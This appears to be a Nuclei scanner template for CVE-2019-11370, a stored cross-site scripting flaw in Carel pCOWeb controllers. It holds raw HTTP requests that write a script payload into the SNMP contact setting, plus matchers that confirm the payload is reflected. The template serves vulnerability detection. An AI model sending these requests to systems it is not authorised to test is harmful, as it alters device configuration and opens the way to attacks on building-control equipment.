id: CVE-2019-11370

info:
  name: Carel pCOWeb < B1.2.1 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Carel pCOWeb < < B1.2.1 allows attackers to execute cross site scripting in /config/pw_snmp.html.
  reference:
    - https://www.exploit-db.com/exploits/46897
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-11370
    - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370
  tags: cve,xss,2019

requests:
  - raw:
      - |
        POST /config/pw_snmp_done.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

      - |
        GET /config/pw_snmp.html HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(123)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200